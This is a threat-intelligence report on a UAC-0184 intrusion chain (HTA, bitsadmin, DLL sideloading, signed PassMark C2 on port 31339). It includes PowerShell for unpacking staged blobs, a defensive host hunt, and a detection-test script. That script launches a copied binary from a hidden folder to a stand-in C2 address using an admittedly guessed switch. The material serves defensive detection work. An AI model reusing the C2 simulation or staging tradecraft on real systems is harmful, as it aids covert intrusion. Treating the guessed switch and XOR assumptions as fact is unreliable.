SOC Prime Bias: Critical

19 May 2026 13:14 UTC

UAC-0184: From HTA to a Signed Network Stack

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report outlines a multi-stage intrusion aimed at Ukrainian defense personnel that starts with malicious HTA files delivered through bitsadmin and LNK shortcut files. The payload is staged inside a ZIP archive, then uses DLL sideloading with Plane9 components and custom decoding methods, including XOR and LZNT1, to unpack signed tools such as PassMark Endpoint together with a malicious input.dll. Network activity is disguised through legitimate-looking UDP multicast discovery on port 31339. No static external command-and-control server was identified in the analyzed samples.

Investigation

Analysis of the HTA-based delivery chain revealed bitsadmin commands that downloaded a ZIP archive containing Cluster-Overlay64.exe and related DLL files. Reverse engineering exposed a loader sequence that extracted filter.bin and kernel-diag.lib, decoded them, and then loaded evr.dll. The final stage dropped VSLauncher.exe along with a signed PassMark input.dll, which enabled UDP multicast discovery and TCP communication over port 31339. The attackers relied on signed binaries and legitimate code signatures to reduce suspicion and evade detection.
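
The XOR and LZNT1 decoding named above can be reproduced on an analyst workstation with the same ntdll routine Windows itself uses for LZNT1. The script below is an added example written for this page, not code recovered from the UAC-0184 samples or published by SOC Prime. It assumes the loader first removes a single-byte XOR key and then LZNT1-decompresses the result; the report does not give the key, the key length or the order of the two steps, so the key 0x5A and the sample plaintext used in the self-test are constructed here. The inverse transform is included only so the self-test runs offline.

```powershell
# Added example (editor's, not UAC-0184 or SOC Prime code): reproduce the assumed
# XOR-then-LZNT1 unpacking of a staged blob such as filter.bin via ntdll.
# ASSUMPTIONS not taken from the report: single-byte XOR key removed first, then LZNT1;
# the key value 0x5A and the sample plaintext below are constructed for the self-test.
if (-not ('Ntdll' -as [type])) {
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Ntdll {
    [DllImport("ntdll.dll")]
    public static extern int RtlGetCompressionWorkSpaceSize(ushort format, out uint bufferWs, out uint fragmentWs);
    [DllImport("ntdll.dll")]
    public static extern int RtlCompressBuffer(ushort format, byte[] src, uint srcLen, byte[] dst, uint dstLen,
                                               uint chunkSize, out uint finalLen, IntPtr workSpace);
    [DllImport("ntdll.dll")]
    public static extern int RtlDecompressBuffer(ushort format, byte[] dst, uint dstLen, byte[] src, uint srcLen,
                                                 out uint finalLen);
}
"@
}

$LZNT1 = [uint16]2   # COMPRESSION_FORMAT_LZNT1 | COMPRESSION_ENGINE_STANDARD

function Unpack-XorLznt1 {
    # Reverse the assumed loader transform: XOR every byte with $Key, then LZNT1-decompress.
    # A wrong key normally surfaces as STATUS_BAD_COMPRESSION_BUFFER (0xC0000242) and is thrown.
    param([Parameter(Mandatory)][byte[]]$Blob, [byte]$Key, [int]$MaxOut = 4MB)
    $xored = New-Object byte[] $Blob.Length
    for ($i = 0; $i -lt $Blob.Length; $i++) { $xored[$i] = $Blob[$i] -bxor $Key }
    $out = New-Object byte[] $MaxOut
    [uint32]$final = 0
    $status = [Ntdll]::RtlDecompressBuffer($LZNT1, $out, [uint32]$out.Length, $xored, [uint32]$xored.Length, [ref]$final)
    if ($status -ne 0) { throw ("RtlDecompressBuffer failed, NTSTATUS 0x{0:X8}" -f $status) }
    $result = New-Object byte[] $final
    [Array]::Copy($out, $result, $final)
    return ,$result
}

function Pack-Lznt1Xor {
    # Build a test blob the way the loader would have to see it: LZNT1-compress, then XOR.
    param([Parameter(Mandatory)][byte[]]$Plain, [byte]$Key)
    [uint32]$bufWs = 0; [uint32]$fragWs = 0
    $status = [Ntdll]::RtlGetCompressionWorkSpaceSize($LZNT1, [ref]$bufWs, [ref]$fragWs)
    if ($status -ne 0) { throw ("RtlGetCompressionWorkSpaceSize failed, NTSTATUS 0x{0:X8}" -f $status) }
    $ws = [Runtime.InteropServices.Marshal]::AllocHGlobal([int]$bufWs)
    try {
        $dst = New-Object byte[] ($Plain.Length * 2 + 64)   # LZNT1 can slightly expand incompressible input
        [uint32]$final = 0
        $status = [Ntdll]::RtlCompressBuffer($LZNT1, $Plain, [uint32]$Plain.Length, $dst, [uint32]$dst.Length, 4096, [ref]$final, $ws)
        if ($status -ne 0) { throw ("RtlCompressBuffer failed, NTSTATUS 0x{0:X8}" -f $status) }
        $blob = New-Object byte[] $final
        for ($i = 0; $i -lt $final; $i++) { $blob[$i] = $dst[$i] -bxor $Key }
        return ,$blob
    } finally {
        [Runtime.InteropServices.Marshal]::FreeHGlobal($ws)
    }
}

# --- Constructed self-test: round-trip a fake staged payload ---------------------------
$key      = [byte]0x5A
$plain    = [Text.Encoding]::ASCII.GetBytes("MZ" + ("constructed stage payload " * 40))
$blob     = Pack-Lznt1Xor -Plain $plain -Key $key
$unpacked = Unpack-XorLznt1 -Blob $blob -Key $key
$ok = [Convert]::ToBase64String($plain) -eq [Convert]::ToBase64String([byte[]]$unpacked)
"packed {0} bytes -> unpacked {1} bytes, round-trip OK: {2}" -f $blob.Length, $unpacked.Length, $ok

# Real use against evidence (path and key are yours to supply):
#   $dec = Unpack-XorLznt1 -Blob ([IO.File]::ReadAllBytes('C:\evidence\filter.bin')) -Key $key
#   [IO.File]::WriteAllBytes('C:\evidence\filter.decoded', $dec)
```

If the decoded output is not a PE or other recognisable format, the loader's order of operations or key size differs from the assumption above; try LZNT1 before XOR, or a multi-byte key, before concluding the blob uses a different scheme.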

Mitigation

Defenders should block execution of mshta.exe and prevent bitsadmin from downloading content from untrusted sources. Monitoring should focus on LNK files containing bitsadmin command lines and temporary filenames beginning with ~tmp. Security teams should also detect suspicious DLL sideloading involving Plane9Engine.dll or openvr_api.dll. Alerts should be configured for UDP and TCP traffic on port 31339 from hosts that do not normally use PassMark software. Application allow-listing for VSLauncher.exe and inspection for unexpected input.dll files in the System32 or SysWOW64 paths are also recommended.
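
The checks in the preceding paragraph can be scripted for a single host. The script below is an added example, not SOC Prime's detection content or anything recovered from the intrusion: it hunts for LNK files that invoke bitsadmin or mshta or reference ~tmp names, recent BITS transfer jobs, Plane9Engine.dll or openvr_api.dll mapped from outside an assumed Plane9 install path, an input.dll under System32 or SysWOW64 whose signer is not Microsoft, and live TCP or UDP endpoints on 31339. The Plane9 install root, the LNK search roots and the list of hosts sanctioned to run PassMark software are assumptions and must be tuned locally.

```powershell
# Added example (editor's, not SOC Prime detection content): host-side hunt for the artefacts
# named in the Mitigation section. Run elevated on Windows PowerShell 5.1 or PowerShell 7.
# ASSUMPTIONS (not from the report): the Plane9 install root, the LNK search roots and the
# list of hosts sanctioned to run PassMark software. Tune all three before use.

function Find-SuspiciousLnk {
    # LNK shortcuts whose target or arguments invoke bitsadmin/mshta or reference ~tmp filenames
    param([string[]]$Roots = @("$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", $env:TEMP))
    $shell = New-Object -ComObject WScript.Shell
    foreach ($lnk in Get-ChildItem -Path $Roots -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue) {
        try { $sc = $shell.CreateShortcut($lnk.FullName) } catch { continue }
        $cmd = "$($sc.TargetPath) $($sc.Arguments)"
        if ($cmd -match '(?i)bitsadmin|mshta|~tmp') {
            [pscustomobject]@{ Check = 'LNK'; Where = $lnk.FullName; Detail = $cmd }
        }
    }
}

function Find-BitsDownload {
    # BITS client operational log: event 59 records the URL of each transfer job BITS starts
    param([int]$Days = 7)
    $filter = @{ LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 59; StartTime = (Get-Date).AddDays(-$Days) }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        if ($e.Message -match 'https?://\S+') {
            [pscustomobject]@{ Check = 'BITS job'; Where = $e.TimeCreated; Detail = $Matches[0] }
        }
    }
}

function Find-SideloadedModule {
    # Plane9Engine.dll / openvr_api.dll mapped into any process from outside the expected install path
    param([string[]]$Names = @('Plane9Engine.dll', 'openvr_api.dll'),
          [string]$ExpectedRoot = "$env:ProgramFiles\Plane9")   # assumption: legitimate Plane9 root
    foreach ($p in Get-Process) {
        try { $mods = $p.Modules } catch { continue }   # protected or other-session processes throw
        foreach ($m in $mods) {
            if ($Names -contains $m.ModuleName -and -not $m.FileName.StartsWith($ExpectedRoot, 'OrdinalIgnoreCase')) {
                [pscustomobject]@{ Check = 'Sideload'; Where = "$($p.ProcessName) ($($p.Id))"; Detail = $m.FileName }
            }
        }
    }
}

function Find-UnexpectedInputDll {
    # input.dll under System32/SysWOW64 whose signer is not Microsoft. A legitimate Microsoft input.dll
    # may already live there and is typically catalog-signed; Get-AuthenticodeSignature checks catalogs.
    foreach ($dir in "$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64") {
        $f = Join-Path $dir 'input.dll'
        if (-not (Test-Path $f)) { continue }
        $sig  = Get-AuthenticodeSignature -FilePath $f
        $subj = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
        if ($sig.Status -ne 'Valid' -or $subj -notmatch 'O=Microsoft Corporation') {
            [pscustomobject]@{ Check = 'input.dll'; Where = $f; Detail = "$($sig.Status); signer: $subj" }
        }
    }
}

function Find-Port31339 {
    # Live TCP connections or UDP sockets on 31339 (the multicast discovery shows up as a UDP socket)
    # on a host that is not sanctioned to run PassMark software
    param([int]$Port = 31339, [string[]]$SanctionedPassMarkHosts = @())   # assumption: fill from your CMDB
    if ($SanctionedPassMarkHosts -contains $env:COMPUTERNAME) { return }
    $tcp = Get-NetTCPConnection -ErrorAction SilentlyContinue | Where-Object { $_.LocalPort -eq $Port -or $_.RemotePort -eq $Port }
    $udp = Get-NetUDPEndpoint -LocalPort $Port -ErrorAction SilentlyContinue
    foreach ($ep in (@($tcp) + @($udp) | Where-Object { $_ })) {
        $owner  = Get-Process -Id $ep.OwningProcess -ErrorAction SilentlyContinue
        $remote = if ($ep.RemoteAddress) { "$($ep.RemoteAddress):$($ep.RemotePort)" } else { 'UDP socket' }
        [pscustomobject]@{ Check = "Port $Port"; Where = "$($owner.ProcessName) ($($ep.OwningProcess))"; Detail = "$($ep.LocalAddress):$($ep.LocalPort) <-> $remote" }
    }
}

$findings = @(Find-SuspiciousLnk) + @(Find-BitsDownload) + @(Find-SideloadedModule) +
            @(Find-UnexpectedInputDll) + @(Find-Port31339)
if ($findings) { $findings | Format-Table -AutoSize -Wrap } else { 'No matching artefacts found on this host.' }
```

Each function emits one object per finding so the output can be exported with Export-Csv or pushed to a SIEM. Expect the input.dll check to need a local allow-list entry on hosts where a third-party vendor legitimately ships a file of that name, and expect the port check to be noisy on hosts that run PassMark software until the sanctioned-host list is populated.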

Response

If related activity is detected, isolate the affected system immediately, collect volatile memory and the dropped files, and perform forensic analysis of the deployed utilities. Hunt across the environment for other hosts showing the same LNK artifacts, DLL sideloading patterns, or UDP multicast behavior. Remove all malicious files, revoke any compromised certificates if applicable, and reset credentials associated with the affected accounts. Detection content should then be updated using the extracted indicators.

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    %% Node definitions
    initial_access["<b>Initial Access</b> – T1547.009 Shortcut Modification<br/><b>Technique</b>: Malicious LNK shortcut<br/><b>Additional</b>: T1027.012 LNK Icon Smuggling"]
    class initial_access action
    execution["<b>Execution</b> – T1218.005 Mshta Proxy Execution<br/><b>Technique</b>: mshta runs HTA<br/><b>Additional</b>: T1204.002 User Execution"]
    class execution action
    download["<b>Download Stage</b> – T1059.003 Windows Command Shell<br/><b>Techniques</b>: PowerShell, bitsadmin<br/><b>Related</b>: T1071.002 FTP, T1570 Lateral Tool Transfer"]
    class download action
    staged_payload["<b>Staged Payload</b> – T1055.001 DLL Injection<br/><b>Techniques</b>: Plane9 visualizer, openvr_api.dll<br/><b>Additional</b>: T1546.009 AppCert DLLs"]
    class staged_payload action
    obfuscation["<b>Obfuscation</b> – T1027 Obfuscated Files<br/><b>Details</b>: filter.bin XOR and LZNT1<br/><b>Additional</b>: T1027.004 Compile After Delivery, T1573.001 Symmetric Cryptography"]
    class obfuscation action
    deployment["<b>Payload Deployment</b> – T1546.009 Event Triggered Execution<br/><b>Process</b>: VSLauncher.exe loads input.dll"]
    class deployment action
    credential["<b>Credential Collection</b> – T1003 Credential Dumping<br/><b>Method</b>: MiniDumpWriteDump via injection"]
    class credential action
    c2["<b>Command and Control</b> – T1571 Non Standard Port<br/><b>Method</b>: UDP multicast discovery, TCP on 31339<br/><b>Additional</b>: T1090 Proxy"]
    class c2 action
    %% Connections
    initial_access -->|leads to| execution
    execution -->|triggers| download
    download -->|provides| staged_payload
    staged_payload -->|contains| obfuscation
    obfuscation -->|used in| deployment
    deployment -->|enables| credential
    credential -->|reports to| c2

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The adversary has obtained a copy of PassMark BurnInTest.exe (a legitimate, signed benchmarking tool) and repurposes it as a covert C2 client. It stands in for the signed PassMark components (VSLauncher.exe, input.dll) seen in the actual intrusion, so the telemetry it produces is a signed PassMark binary talking on port 31339 rather than the exact files from the report. By invoking the binary with custom arguments, it opens a TCP connection to the attacker-controlled server on port 31339. The firewall logs the application name ("PassMark BurnInTest"), and the detection rule carries a filter clause (product|contains: "PassMark BurnInTest") meant to suppress the vendor's legitimate installs; the test must confirm that port-31339 traffic from a copy of the binary run out of a hidden directory is still flagged as suspicious rather than silently excluded by that filter. If the alert does not fire, the filter is too broad and needs to be scoped to sanctioned hosts or install paths. The steps are:

    1. Copy the legitimate BurnInTest binary to a hidden directory.
    2. Execute it with arguments that force a network connection to the C2 IP (e.g., 192.0.2.55) on port 31339.
    3. Keep the process running long enough for the firewall to log the outbound connection.
  • Regression Test Script:

    # -------------------------------------------------
    # Repurpose PassMark BurnInTest for covert C2 traffic
    # -------------------------------------------------
    # Adjust $burnInPath if BurnInTest is installed elsewhere; the test aborts if it is missing.
    $burnInPath = Join-Path $env:ProgramFiles 'PassMark\BurnInTest\BurnInTest.exe'
    $hiddenDir  = Join-Path $env:ProgramData '.temp'
    $c2IP       = "192.0.2.55"   # TEST-NET-2 address standing in for the attacker server
    $c2Port     = 31339
    
    if (-not (Test-Path $burnInPath)) {
        throw "BurnInTest not found at $burnInPath - install it or adjust the path before running this test."
    }
    
    # 1. Ensure hidden directory exists
    if (-not (Test-Path $hiddenDir)) {
        New-Item -ItemType Directory -Path $hiddenDir -Force | Out-Null
        # Hide the folder (Attributes is a flags enum, so OR the Hidden bit in)
        $dir = Get-Item $hiddenDir -Force
        $dir.Attributes = $dir.Attributes -bor [IO.FileAttributes]::Hidden
    }
    
    # 2. Copy the binary (simulating an attacker-owned copy)
    $copiedExe = Join-Path $hiddenDir "BurnInTest.exe"
    Copy-Item -Path $burnInPath -Destination $copiedExe -Force
    
    # 3. Launch the binary to create a TCP connection to C2
    #    (Assumes BurnInTest supports a /net switch - this is illustrative; substitute whatever
    #    argument actually makes your copy open the connection.)
    #    $args is a PowerShell automatic variable, so the argument string uses another name.
    $argList = "/net $c2IP $c2Port"
    $proc = Start-Process -FilePath $copiedExe -ArgumentList $argList -PassThru
    
    Write-Host "PassMark BurnInTest launched (PID $($proc.Id)) - C2 traffic should appear in firewall logs."
    # Keep the process alive for 30 seconds to ensure logging
    Start-Sleep -Seconds 30
  • Cleanup Commands:

    # -------------------------------------------------
    # Cleanup after simulated PassMark BurnInTest activity
    # -------------------------------------------------
    $hiddenDir = Join-Path $env:ProgramData '.temp'
    
    # Stop any lingering BurnInTest process
    Get-Process -Name "BurnInTest" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remove the hidden directory and its contents
    if (Test-Path $hiddenDir) {
        Remove-Item -Recurse -Force $hiddenDir
    }
    
    Write-Host "Cleanup complete - no residual BurnInTest binaries or processes remain."